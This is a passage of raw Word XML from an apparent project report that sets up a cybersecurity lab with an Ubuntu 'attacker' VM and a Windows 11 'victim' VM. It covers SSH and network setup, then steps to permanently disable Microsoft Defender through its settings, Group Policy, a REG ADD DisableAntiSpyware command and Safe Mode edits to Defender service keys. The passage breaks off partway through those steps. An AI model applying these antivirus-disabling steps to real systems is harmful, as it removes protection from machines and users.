        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.1 System Prerequisites and Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Before proceeding with the setup of virtual machines and cybersecurity tools, it's essential to ensure that the system meets certain prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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Minimum System Requirements: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The system should have a minimum of 8GB of RAM to ensure smooth operation. For optimal performance, it is recommended to have 16GB or more.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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Disk Space:</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Sufficient disk space is required, as the project may consume approximately 80-100GB of storage space. Ensure that the system has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ample free space available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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Virtualization Enabled:</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Virtualization must be enabled in the system BIOS settings to support the creation and operation of virtual machines using software like VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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rPr>
        <w:t xml:space="preserve">VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Installed and Ubuntu and Windows11 setup:</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lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>virtualization platform that allows for the creation and management of virtual machines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can be downloaded from the official website</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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rPr>
        <w:t>For the Ubuntu Attacker VM, it is recommended to use the Ubuntu Server version, as it provides a lightweight and command-line interface (CLI) focused environment, suitable for running server applications and performing command-line operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and also it comes preinstalled with necessary packages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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For the Windows11 Victim VM, you can use the Windows 11 ISO file to set up a virtual machine in VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>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Both Virtual Machines Network Configuration is set to Bridged Adapter</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50840" cy="2907665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="WhatsApp Image 2024-02-29 at 21.23.51_ef458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2-29 at 21.23.51_ef458ff0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect l="381" t="452" r="485" b="5543"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5450840" cy="290766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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setting Up SSH Client Access and Network Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Setting up SSH client access and configuring the network are crucial steps in ensuring seamless communication and control between the virtual machines (VMs) involved in the project. This section outlines the process of establishing SSH client access and configuring the network settings for the Ubuntu Attacker VM and the Windows11 Victim VM.</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lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Setting Up SSH Client Access for Ubuntu Attacker VM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Installation of SSH Client:</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Ensure that the SSH client is installed on the host machine.</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If not installed, it can be installed using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="120" w:firstLineChars="50"/>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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>udo apt-get install openssh-client</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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Enabling SSH Service:</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Verify that the SSH service is running on the Ubuntu Attacker VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="120" w:firstLineChars="50"/>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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>udo service ssh start</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eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Generating SSH Key Pair:</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Generate an SSH key pair on the host machine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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sh-keygen -t rsa -b 2048</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56"/>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Copying Public Key to Ubuntu Attacker VM:</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Copy the public key to the Ubuntu Attacker VM to enable passwordless SSH authentication</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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sh-copy-id user@ubuntu_attacker_vm_ip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bCs/>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lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Network Configuration for Both VMs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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Setting Network to Static IP:</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Assign static IP addresses to both the Ubuntu Attacker VM and the Windows11 Victim VM.</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Modify the network adapter settings of each VM to use a static IP configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>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Network Connectivity Testing:</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Ensure that both VMs can ping each other to verify network connectivity:</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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ing ubuntu_attacker_vm_ip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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ing windows11_victim_vm_ip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rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Disabling Windows Defender and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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To ensure smooth operation and prevent interference with our cybersecurity activities, it's crucial to permanently disable Microsoft Defender and install Sysmon for enhanced system monitoring. Follow these steps to accomplish the necessary configurations:</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IN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Permanently Disable Microsoft Defender:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>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Disable Defender Protections:</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Open the Virus and threat protections settings by searching in the taskbar search box and clicking on "Manage settings."</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Disable the following protections:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Real-time protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Dev Drive protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Cloud-delivered protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Automatic sample submission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Tamper protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4635500" cy="2687955"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1714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4635500" cy="2687955"/>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IN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Permanently Disable Defender via Group Policy Editor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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Open the Group Policy Editor by running gpedit.msc in an Administrative Command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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Navigate to Computer Configuration &gt; Administrative Templates &gt; Windows Components &gt; Microsoft Defender Antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Double-click "Turn off Microsoft Defender Antivirus" and set it to "Enabled."</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IN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Permanently Disable Defender via Registry:</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Open an Administrative Command prompt and run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>REG ADD "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f</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IN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Disable Defender Services via Registry:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Enter Safe Mode:</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Type </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msconfig</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 xml:space="preserve"> in the search box </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">to open System configuration dialog and head to Boot tab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and follow the prompts to enter Safe Mode.</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r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5534025" cy="3731260"/>
            <wp:effectExtent l="0" t="0" r="952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534025" cy="3731260"/>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val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>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In Safe Boot Mode:</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Open the Registry Editor by typing </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regedit</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 xml:space="preserve"> in the search box.</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Browse to the following registry locations:</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Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense</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Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEM\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
